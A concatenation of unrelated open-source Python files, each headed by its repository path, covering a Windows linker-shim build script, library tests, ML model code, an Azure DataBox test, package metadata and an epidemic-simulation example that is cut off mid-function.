universal_newlines=True)
out, _ = p.communicate()
return p.returncode, out
finally:
os.unlink(filename)
def get_vc_dir():
_, out = run_with_vsvars('echo VCINSTALLDIR=%VCINSTALLDIR%')
for line in out.splitlines(): # pylint: disable-msg=E1103
if line.startswith('VCINSTALLDIR='):
return line[len('VCINSTALLDIR='):]
return None
def build(infile):
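  # Compile infile with cl.exe into BUILD_DIR, but only when the source is newer than the existing limiter.exe.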
if not os.path.exists(BUILD_DIR):
os.makedirs(BUILD_DIR)
outfile = 'limiter.exe'
outpath = os.path.join(BUILD_DIR, outfile)
cpptime = os.path.getmtime(infile)
if not os.path.exists(outpath) or cpptime > os.path.getmtime(outpath):
print 'Building %s...' % outfile
rc, out = run_with_vsvars(
'cl /nologo /Ox /Zi /W4 /WX /D_UNICODE /DUNICODE'
' /D_CRT_SECURE_NO_WARNINGS /EHsc %s /link /out:%s'
% (os.path.join('..', infile), outfile), BUILD_DIR)
if rc:
print out
print 'Failed to build %s' % outfile
sys.exit(1)
else:
print '%s already built' % outfile
return outpath
def main():
# Switch to our own dir.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
if sys.argv[-1] == 'clean':
if os.path.exists(BUILD_DIR):
shutil.rmtree(BUILD_DIR)
for exe in glob.glob('*.exe'):
os.unlink(exe)
return 0
vcdir = os.environ.get('VCINSTALLDIR')
if not vcdir:
vcdir = get_vc_dir()
if not vcdir:
print 'Could not get VCINSTALLDIR. Run vsvars32.bat?'
return 1
os.environ['PATH'] += (';' + os.path.join(vcdir, 'bin') +
';' + os.path.join(vcdir, r'..\Common7\IDE'))
# Verify that we can find link.exe.
link = os.path.join(vcdir, 'bin', 'link.exe')
if not os.path.exists(link):
print 'link.exe not found at %s' % link
return 1
exe_name = build('limiter.cc')
for shim_exe in ('lib.exe', 'link.exe'):
newpath = '%s__LIMITER.exe' % shim_exe
shutil.copyfile(exe_name, newpath)
print '%s shim built. Use with msbuild like: "/p:LinkToolExe=%s"' \
% (shim_exe, os.path.abspath(newpath))
return 0
if __name__ == '__main__':
sys.exit(main())
|
python-bitwise-operators/stegano/eraser.py | syberflea/materials | 3,682 | 12684665 | """
Secret file eraser.
"""
from itertools import islice
from random import random
from .bitmap import Bitmap
def erase(bitmap: Bitmap) -> None:
"""Scramble a previously hidden data."""
if bitmap.reserved_field > 0:
for byte_offset in islice(bitmap.byte_offsets, bitmap.reserved_field):
bitmap[byte_offset] = randomize_lsb(bitmap[byte_offset])
bitmap.reserved_field = 0
print("Erased a secret file from the bitmap")
else:
print("Secret file not found in the bitmap")
def randomize_lsb(value: int) -> int:
"""Set a random bit on the least-significant position."""
return value & ~1 if random() < 0.5 else value | 1
|
tools/perf/page_sets/desktop_ui/webui_tab_strip_story.py | chromium/chromium | 14,668 | 12684668 | <gh_stars>1000+
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from page_sets.desktop_ui.browser_element_identifiers import \
kTabCounterButtonElementId
from page_sets.desktop_ui.custom_metric_utils import SetMetricNames
from page_sets.desktop_ui.js_utils import MEASURE_JS_MEMORY
from page_sets.desktop_ui.multitab_story import MultiTabStory
from page_sets.desktop_ui.ui_devtools_utils import ClickOn
from page_sets.desktop_ui.url_list import TOP_URL
from page_sets.desktop_ui.webui_utils import Inspect
from page_sets.desktop_ui import story_tags
WEBUI_TAB_STRIP_BENCHMARK_UMA = [
'TabStrip.Tab.Views.ActivationAction',
'TabStrip.Tab.WebUI.ActivationAction',
'WebUITabStrip.CloseAction',
'WebUITabStrip.CloseTabAction',
'WebUITabStrip.LoadCompletedTime',
'WebUITabStrip.LoadDocumentTime',
'WebUITabStrip.OpenAction',
'WebUITabStrip.OpenDuration',
'WebUITabStrip.TabActivation',
'WebUITabStrip.TabCreation',
'WebUITabStrip.TabDataReceived',
]
WEBUI_TAB_STRIP_CUSTOM_METRIC_NAMES = [
'Jank',
'Tab.Preview.CompressJPEG',
'Tab.Preview.CompressJPEGWithFlow',
'Tab.Preview.VideoCapture',
'Tab.Preview.VideoCaptureFrameReceived',
'TabStripPageHandler:HandleGetGroupVisualData',
'TabStripPageHandler:HandleGetLayout',
'TabStripPageHandler:HandleGetTabs',
'TabStripPageHandler:HandleGetThemeColors',
'TabStripPageHandler:HandleSetThumbnailTracked',
'TabStripPageHandler:HandleThumbnailUpdate',
'TabStripPageHandler:NotifyLayoutChanged',
'TabStripPageHandler:OnTabGroupChanged',
'TabStripPageHandler:OnTabStripModelChanged',
'TabStripPageHandler:TabChangedAt',
'TabStripPageHandler:TabGroupedStateChanged',
]
WEBUI_TAB_STRIP_URL = 'chrome://tab-strip.top-chrome/'
class WebUITabStripStory(MultiTabStory):
"""Base class for webui tab strip stories"""
def RunPageInteractions(self, action_runner):
SetMetricNames(action_runner, WEBUI_TAB_STRIP_CUSTOM_METRIC_NAMES)
ClickOn(self._devtools, element_id=kTabCounterButtonElementId)
action_runner = Inspect(action_runner.tab.browser, WEBUI_TAB_STRIP_URL)
action_runner.ExecuteJavaScript(MEASURE_JS_MEMORY %
'webui_tab_strip:used_js_heap_size_begin')
self.InteractWithPage(action_runner)
action_runner.ExecuteJavaScript(MEASURE_JS_MEMORY %
'webui_tab_strip:used_js_heap_size_end')
def InteractWithPage(self, action_runner):
self.ScrollTabs(action_runner)
action_runner.Wait(5)
def ScrollTabs(self, action_runner):
action_runner.Wait(1)
self.StartMeasuringFrameTime(action_runner,
'webui_tab_strip:frame_time_on_scroll')
action_runner.ScrollElement(element_function=SCROLL_ELEMENT_FUNCTION,
direction='left')
self.StopMeasuringFrameTime(action_runner)
action_runner.Wait(1)
def WillStartTracing(self, chrome_trace_config):
super(WebUITabStripStory, self).WillStartTracing(chrome_trace_config)
chrome_trace_config.category_filter.AddIncludedCategory('benchmark')
chrome_trace_config.category_filter.AddIncludedCategory('ui')
chrome_trace_config.EnableUMAHistograms(*WEBUI_TAB_STRIP_BENCHMARK_UMA)
class WebUITabStripStoryCleanSlate(WebUITabStripStory):
NAME = 'webui_tab_strip:clean_slate'
URL_LIST = []
URL = 'about:blank'
TAGS = [story_tags.SMOKE_TEST]
WAIT_FOR_NETWORK_QUIESCENCE = False
class WebUITabStripStoryTop10(WebUITabStripStory):
NAME = 'webui_tab_strip:top10:2020'
URL_LIST = TOP_URL[:10]
URL = URL_LIST[0]
WAIT_FOR_NETWORK_QUIESCENCE = True
class WebUITabStripStoryTop10Loading(WebUITabStripStory):
NAME = 'webui_tab_strip:top10:loading:2020'
URL_LIST = TOP_URL[:10]
URL = URL_LIST[0]
WAIT_FOR_NETWORK_QUIESCENCE = False
class WebUITabStripStoryMeasureMemory(WebUITabStripStory):
NAME = 'webui_tab_strip:measure_memory'
URL_LIST = []
URL = 'about:blank'
WAIT_FOR_NETWORK_QUIESCENCE = False
def WillStartTracing(self, chrome_trace_config):
super(WebUITabStripStoryMeasureMemory,
self).WillStartTracing(chrome_trace_config)
chrome_trace_config.category_filter.AddExcludedCategory('*')
chrome_trace_config.category_filter.AddIncludedCategory('blink.console')
chrome_trace_config.category_filter.AddDisabledByDefault(
'disabled-by-default-memory-infra')
def GetExtraTracingMetrics(self):
return super(WebUITabStripStoryMeasureMemory,
self).GetExtraTracingMetrics() + ['memoryMetric']
def InteractWithPage(self, action_runner):
action_runner.MeasureMemory(deterministic_mode=True)
class WebUITabStripStoryMeasureMemory2Window(WebUITabStripStoryMeasureMemory):
NAME = 'webui_tab_strip:measure_memory:2window'
URL_LIST = []
URL = 'about:blank'
WAIT_FOR_NETWORK_QUIESCENCE = False
def InteractWithPage(self, action_runner):
action_runner.tab.browser.tabs.New(url='about:blank', in_new_window=True)
action_runner.Wait(1)
action_runner.MeasureMemory(deterministic_mode=True)
SCROLL_ELEMENT_FUNCTION = '''
document.querySelector('tabstrip-tab-list')
'''
|
tests/draw/svg/test_visibility.py | rianmcguire/WeasyPrint | 4,512 | 12684672 | <reponame>rianmcguire/WeasyPrint<gh_stars>1000+
"""
weasyprint.tests.test_draw.svg.test_visibility
----------------------------------------------
Test how the visibility is controlled with "visibility" and "display"
attributes.
"""
from ...testing_utils import assert_no_logs
from .. import assert_pixels
@assert_no_logs
def test_visibility_visible():
assert_pixels('visibility_visible', 9, 9, '''
_________
_________
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect visibility="visible"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_visibility_hidden():
assert_pixels('visibility_hidden', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect visibility="hidden"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_visibility_inherit_hidden():
assert_pixels('visibility_inherit_hidden', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g visibility="hidden">
<rect x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
@assert_no_logs
def test_visibility_inherit_visible():
assert_pixels('visibility_inherit_visible', 9, 9, '''
_________
_________
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g visibility="hidden">
<rect visibility="visible"
x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
@assert_no_logs
def test_display_inline():
assert_pixels('display_inline', 9, 9, '''
_________
_________
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect display="inline"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_display_none():
assert_pixels('display_none', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect display="none"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_display_inherit_none():
assert_pixels('display_inherit_none', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g display="none">
<rect x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
@assert_no_logs
def test_display_inherit_inline():
assert_pixels('display_inherit_inline', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g display="none">
<rect display="inline"
x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
|
conversion/convert_depth_maps.py | thduynguyen/sixd_toolkit | 127 | 12684724 | # Author: <NAME> (<EMAIL>)
# Center for Machine Perception, Czech Technical University in Prague
import os
import sys
import glob
import numpy as np
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from pysixd import inout
from params.dataset_params import get_dataset_params
par = get_dataset_params('hinterstoisser')
# data_ids = range(1, par.obj_count + 1)
data_ids = range(1, par['scene_count'] + 1)
# depth_mpath = par.train_depth_mpath
depth_mpath = par['test_depth_mpath']
scale = 0.1
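# Every depth map is multiplied by this factor and written back as uint16.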
for data_id in data_ids:
print('Processing id: ' + str(data_id))
depth_paths = sorted(glob.glob(os.path.join(
os.path.dirname(depth_mpath.format(data_id, 0)), '*')))
for depth_path in depth_paths:
d = inout.load_depth(depth_path)
d *= scale
d = np.round(d).astype(np.uint16)
inout.save_depth(depth_path, d)
|
robustness_metrics/datasets/__init__.py | goncaloperes/robustness_metrics | 383 | 12684731 | # coding=utf-8
# Copyright 2021 The Robustness Metrics Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Module-level convenience functions."""
from robustness_metrics.datasets import base
from robustness_metrics.datasets import ood_detection
from robustness_metrics.datasets import tfds
def get(dataset_spec) -> base.Dataset:
"""Fetches a dataset from the dataset registry."""
return base.registry.get_instance(dataset_spec)
def get_available_datasets():
"""Fetches dataset constructor from the dataset registry."""
return base.registry.get_registered_subclasses()
|
Tests/test_Compass.py | lukasz-kozlowski/biopython | 2,856 | 12684735 | # Copyright 2009 by <NAME>. All rights reserved.
# Revisions copyright 2009-2010 by <NAME>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for parsing Compass output."""
import os
import unittest
from Bio import Compass
class CompassTest(unittest.TestCase):
def setUp(self):
file_dir = os.path.join("Compass")
self.test_files = [
os.path.join(file_dir, "comtest1"),
os.path.join(file_dir, "comtest2"),
]
def testCompassScanAndConsume(self):
with open(self.test_files[0]) as handle:
com_record = Compass.read(handle)
self.assertEqual("60456.blo.gz.aln", com_record.query)
self.assertEqual("60456.blo.gz.aln", com_record.hit)
self.assertEqual(0.5, com_record.gap_threshold)
self.assertEqual(388, com_record.query_length)
self.assertEqual(386, com_record.query_filtered_length)
self.assertEqual(388, com_record.hit_length)
self.assertEqual(386, com_record.hit_filtered_length)
self.assertEqual(399, com_record.query_nseqs)
self.assertEqual(12.972, com_record.query_neffseqs)
self.assertEqual(399, com_record.hit_nseqs)
self.assertEqual(12.972, com_record.hit_neffseqs)
self.assertEqual(2759, com_record.sw_score)
self.assertEqual(float("0.00e+00"), com_record.evalue)
def testCompassParser(self):
with open(self.test_files[0]) as handle:
com_record = Compass.read(handle)
self.assertEqual("60456.blo.gz.aln", com_record.query)
def testCompassIteratorEasy(self):
with open(self.test_files[0]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual("60456.blo.gz.aln", com_record.query)
self.assertRaises(StopIteration, next, records)
def testCompassIteratorHard(self):
with open(self.test_files[1]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual("allscop//14982.blo.gz.aln", com_record.hit)
self.assertEqual(float("1.01e+03"), com_record.evalue)
com_record = next(records)
self.assertEqual("allscop//14983.blo.gz.aln", com_record.hit)
self.assertEqual(float("1.01e+03"), com_record.evalue)
com_record = next(records)
self.assertEqual("allscop//14984.blo.gz.aln", com_record.hit)
self.assertEqual(float("5.75e+02"), com_record.evalue)
def testAlignmentParsingOne(self):
with open(self.test_files[1]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual(178, com_record.query_start)
self.assertEqual("KKDLEEIAD", com_record.query_aln)
self.assertEqual(9, com_record.hit_start)
self.assertEqual("QAAVQAVTA", com_record.hit_aln)
self.assertEqual("++ ++++++", com_record.positives)
com_record = next(records)
com_record = next(records)
self.assertEqual(371, com_record.query_start)
self.assertEqual("LEEAMDRMER~~~V", com_record.query_aln)
self.assertEqual(76, com_record.hit_start)
self.assertEqual("LQNFIDQLDNpddL", com_record.hit_aln)
self.assertEqual("+ ++++ + + +", com_record.positives)
def testAlignmentParsingTwo(self):
with open(self.test_files[0]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual(2, com_record.query_start)
self.assertEqual(2, com_record.hit_start)
self.assertEqual("LKERKL", com_record.hit_aln[-6:])
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
research/maskgan/models/bidirectional_vd.py | 873040/Abhishek | 153 | 12684757 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple bidirectional model definitions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from regularization import variational_dropout
FLAGS = tf.app.flags.FLAGS
def discriminator(hparams,
sequence,
is_training,
reuse=None,
initial_state=None):
"""Define the Discriminator graph."""
sequence = tf.cast(sequence, tf.int32)
if FLAGS.dis_share_embedding:
assert hparams.dis_rnn_size == hparams.gen_rnn_size, (
'If you wish to share Discriminator/Generator embeddings, they must be'
' same dimension.')
with tf.variable_scope('gen/decoder/rnn', reuse=True):
embedding = tf.get_variable('embedding',
[FLAGS.vocab_size, hparams.gen_rnn_size])
with tf.variable_scope('dis', reuse=reuse):
def lstm_cell():
return tf.contrib.rnn.BasicLSTMCell(
hparams.dis_rnn_size,
forget_bias=0.0,
state_is_tuple=True,
reuse=reuse)
attn_cell = lstm_cell
if is_training and hparams.dis_vd_keep_prob < 1:
def attn_cell():
return variational_dropout.VariationalDropoutWrapper(
lstm_cell(), FLAGS.batch_size, hparams.dis_rnn_size,
hparams.dis_vd_keep_prob, hparams.dis_vd_keep_prob)
cell_fwd = tf.contrib.rnn.MultiRNNCell(
[attn_cell() for _ in range(hparams.dis_num_layers)],
state_is_tuple=True)
cell_bwd = tf.contrib.rnn.MultiRNNCell(
[attn_cell() for _ in range(hparams.dis_num_layers)],
state_is_tuple=True)
# print initial_state
# print cell_fwd.zero_state(FLAGS.batch_size, tf.float32)
if initial_state:
state_fwd = [[tf.identity(x) for x in inner_initial_state]
for inner_initial_state in initial_state]
state_bwd = cell_bwd.zero_state(FLAGS.batch_size, tf.float32)
else:
state_fwd = cell_fwd.zero_state(FLAGS.batch_size, tf.float32)
state_bwd = cell_bwd.zero_state(FLAGS.batch_size, tf.float32)
def make_mask(keep_prob, units):
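      # Build an inverted-dropout mask: each unit is 0 or 1/keep_prob, so the expected activation magnitude is unchanged.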
random_tensor = keep_prob
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
random_tensor += tf.random_uniform(tf.stack([FLAGS.batch_size, units]))
return tf.floor(random_tensor) / keep_prob
if is_training:
output_mask = make_mask(hparams.dis_vd_keep_prob,
2 * hparams.dis_rnn_size)
if not FLAGS.dis_share_embedding:
embedding = tf.get_variable('embedding',
[FLAGS.vocab_size, hparams.dis_rnn_size])
rnn_inputs = tf.nn.embedding_lookup(embedding, sequence)
rnn_inputs = tf.unstack(rnn_inputs, axis=1)
with tf.variable_scope('rnn') as vs:
outputs, _, _ = tf.contrib.rnn.static_bidirectional_rnn(
cell_fwd, cell_bwd, rnn_inputs, state_fwd, state_bwd, scope=vs)
if is_training:
outputs *= output_mask
# Prediction is linear output for Discriminator.
predictions = tf.contrib.layers.linear(outputs, 1, scope=vs)
predictions = tf.transpose(predictions, [1, 0, 2])
if FLAGS.baseline_method == 'critic':
with tf.variable_scope('critic', reuse=reuse) as critic_scope:
values = tf.contrib.layers.linear(outputs, 1, scope=critic_scope)
values = tf.transpose(values, [1, 0, 2])
return tf.squeeze(predictions, axis=2), tf.squeeze(values, axis=2)
else:
return tf.squeeze(predictions, axis=2), None
|
sdk/databox/azure-mgmt-databox/tests/test_cli_mgmt_databox.py | rsdoherty/azure-sdk-for-python | 2,728 | 12684759 | # coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# TEST SCENARIO COVERAGE
# ----------------------
# Methods Total : 16
# Methods Covered : 16
# Examples Total : 21
# Examples Tested : 21
# Coverage % : 100
# ----------------------
# current method cover: 15/16
import os
import unittest
import azure.mgmt.databox
from devtools_testutils import AzureMgmtTestCase, ResourceGroupPreparer
AZURE_LOCATION = 'eastus'
class MgmtDataBoxTest(AzureMgmtTestCase):
def setUp(self):
super(MgmtDataBoxTest, self).setUp()
self.mgmt_client = self.create_mgmt_client(
azure.mgmt.databox.DataBoxManagementClient
)
@unittest.skip("unavailable in track2")
@ResourceGroupPreparer(location=AZURE_LOCATION)
def test_databox(self, resource_group):
SUBSCRIPTION_ID = None
if self.is_live:
SUBSCRIPTION_ID = os.environ.get("AZURE_SUBSCRIPTION_ID", None)
if not SUBSCRIPTION_ID:
SUBSCRIPTION_ID = self.settings.SUBSCRIPTION_ID
RESOURCE_GROUP = resource_group.name
STORAGE_ACCOUNT_NAME = 'databoxaccountabc'
JOB_NAME = 'testjob'
LOCATION_NAME = "westus"
# JobsCreate[put]
BODY = {
"details": {
"job_details_type": "DataBox",
"contact_details": {
"contact_name": "<NAME>",
"phone": "1234567890",
"phone_extension": "1234",
"email_list": [
"<EMAIL>"
]
},
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"destination_account_details": [
{
"storage_account_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Storage/storageAccounts/" + STORAGE_ACCOUNT_NAME + "",
"data_destination_type": "StorageAccount"
}
]
},
"location": "westus",
"sku": {
"name": "DataBox"
}
}
result = self.mgmt_client.jobs.create(resource_group.name, JOB_NAME, BODY)
result = result.result()
# JobsGet5[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet4[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet3[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet2[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet1[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsListByResourceGroup[get]
result = self.mgmt_client.jobs.list_by_resource_group(resource_group.name)
# JobsList[get]
result = self.mgmt_client.jobs.list()
# OperationsGet[get]
result = self.mgmt_client.operations.list()
# ServiceValidateInputsByResourceGroup[post]
BODY = {
"validation_category": "JobCreationValidation",
"individual_request_details": [
{
"validation_type": "ValidateDataDestinationDetails",
"location": "westus",
"destination_account_details": [
{
"storage_account_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Storage/storageAccounts/" + STORAGE_ACCOUNT_NAME + "",
"data_destination_type": "StorageAccount"
}
]
},
{
"validation_type": "ValidateAddress",
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"device_type": "DataBox"
}
]
}
result = self.mgmt_client.service.validate_inputs_by_resource_group(resource_group.name, LOCATION_NAME, BODY)
# AvailableSkusByResourceGroup[post]
BODY = {
"country": "US",
"location": "westus",
"transfer_type": "ImportToAzure"
}
result = self.mgmt_client.service.list_available_skus_by_resource_group(resource_group.name, LOCATION_NAME, BODY)
"""
# BookShipmentPickupPost[post]
now = dt.datetime.now()
BODY = {
# For new test, change the start time as current date
# and end time as start_time + 2 days
"start_time": now,
"end_time": now + dt.timedelta(days=2),
"shipment_location": "Front desk"
}
self.mgmt_client.jobs.book_shipment_pick_up(resource_group.name, JOB_NAME, BODY)
"""
# JobsListCredentials[post]
result = self.mgmt_client.jobs.list_credentials(resource_group.name, JOB_NAME)
# JobsPatch[patch]
BODY = {
"details": {
"contact_details": {
"contact_name": "<NAME>",
"phone": "1234567890",
"phone_extension": "1234",
"email_list": [
"<EMAIL>"
]
},
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
}
}
}
result = self.mgmt_client.jobs.update(resource_group.name, JOB_NAME, BODY)
result = result.result()
# ServiceRegionConfiguration[post]
# TODO: SKUs are not available in live test
# BODY = {
# "storage_location": "westus",
# "sku_name": "DataBox"
# }
BODY = None
result = self.mgmt_client.service.region_configuration(LOCATION_NAME, BODY)
# ValidateAddressPost[post]
BODY = {
"validation_type": "ValidateAddress",
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"device_type": "DataBox"
}
result = self.mgmt_client.service.validate_address_method(LOCATION_NAME, BODY)
# ServiceValidateInputs[post]
BODY = {
"validation_category": "JobCreationValidation",
"individual_request_details": [
{
"validation_type": "ValidateDataDestinationDetails",
"location": "westus",
"destination_account_details": [
{
"storage_account_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Storage/storageAccounts/" + STORAGE_ACCOUNT_NAME + "",
"data_destination_type": "StorageAccount"
}
]
},
{
"validation_type": "ValidateAddress",
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"device_type": "DataBox"
}
]
}
result = self.mgmt_client.service.validate_inputs(LOCATION_NAME, BODY)
# AvailableSkusPost[post]
BODY = {
"country": "US",
"location": "westus",
"transfer_type": "ImportToAzure"
}
result = self.mgmt_client.service.list_available_skus(LOCATION_NAME, BODY)
# JobsCancelPost[post]
BODY = {
"reason": "CancelTest"
}
result = self.mgmt_client.jobs.cancel(resource_group.name, JOB_NAME, BODY)
# JobsDelete[delete]
result = self.mgmt_client.jobs.delete(resource_group.name, JOB_NAME)
result = result.result()
#------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
|
apps/user/filter.py | parekhpriyanshu/website | 312 | 12684794 |
#!/usr/bin/python
# -*- coding:utf-8 -*-
import django_filters
from django.db.models import Q
from apps.article.models import Article
from apps.user.models import User
class CategoryFilter(django_filters.rest_framework.FilterSet):
category = django_filters.rest_framework.CharFilter(field_name='category__id')
title = django_filters.rest_framework.CharFilter(field_name='title', lookup_expr='icontains')
# top_category = django_filters.rest_framework.NumberFilter(method='top_category_filter')
#
# def top_category_filter(self, queryset, name, value):
# print(queryset, name, value)
# queryset = queryset.filter(Q(category_id=value) | Q(category=value) )
# return queryset
class Meta:
model = Article
fields = ['category','title', ]
class UserFilter(django_filters.rest_framework.FilterSet):
category = django_filters.rest_framework.CharFilter(field_name='id', lookup_expr='icontains')
class Meta:
model = User
fields = ['category', ] |
vehicle/OVMS.V3/components/wolfssl/wrapper/python/wolfcrypt/wolfcrypt/__about__.py | qtwre/Open-Vehicle-Monitoring-System-3 | 322 | 12684817 |
# __about__.py
#
# Copyright (C) 2006-2020 wolfSSL Inc.
#
# This file is part of wolfSSL.
#
# wolfSSL is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# wolfSSL is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1335, USA
#/
metadata = dict(
__name__ = "wolfcrypt",
__version__ = "0.1.9",
__license__ = "GPLv2 or Commercial License",
__author__ = "wolfSSL Inc.",
__author_email__ = "<EMAIL>",
__url__ = "https://wolfssl.github.io/wolfcrypt-py",
__description__ = \
u"A Python library that encapsulates wolfSSL's wolfCrypt API.",
__keywords__ = "security, cryptography, ssl, embedded, embedded ssl",
__classifiers__ = [
u"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
u"License :: Other/Proprietary License",
u"Operating System :: OS Independent",
u"Programming Language :: Python :: 2.7",
u"Programming Language :: Python :: 3.5",
u"Topic :: Security",
u"Topic :: Security :: Cryptography",
u"Topic :: Software Development"
]
)
globals().update(metadata)
__all__ = list(metadata.keys())
|
docs/examples/fig5p4.py | uluturki/Mathematics-of-Epidemics-on-Networks | 136 | 12684828 | import EoN
import networkx as nx
import matplotlib.pyplot as plt
import scipy
import random
def get_deg_seq(N, Pk):
while True: #run until degree sequence has even sum of N entries
deg_seq = []
for counter in range(N):
r = random.random()
for k in Pk:
if Pk[k]>r:
break
else:
r-= Pk[k]
deg_seq.append(k)
if sum(deg_seq)%2 ==0:
break
return deg_seq
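# Illustrative walk-through (editorial addition, not part of the original
# example): get_deg_seq draws each degree by inverse-CDF sampling over Pk.
# For instance, with Pk = {1: 0.5, 2: 0.3, 3: 0.2} and a uniform draw r = 0.6,
# the loop first subtracts Pk[1] (r becomes 0.1), then finds Pk[2] = 0.3 > 0.1
# and breaks, so degree k = 2 is appended. The outer while-loop simply redraws
# the whole sequence until its sum is even, as nx.configuration_model requires.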
def sim_and_plot(G, tau, gamma, rho, tmax, tcount, ax):
t, S, I = EoN.fast_SIS(G, tau, gamma, rho = rho, tmax = tmax)
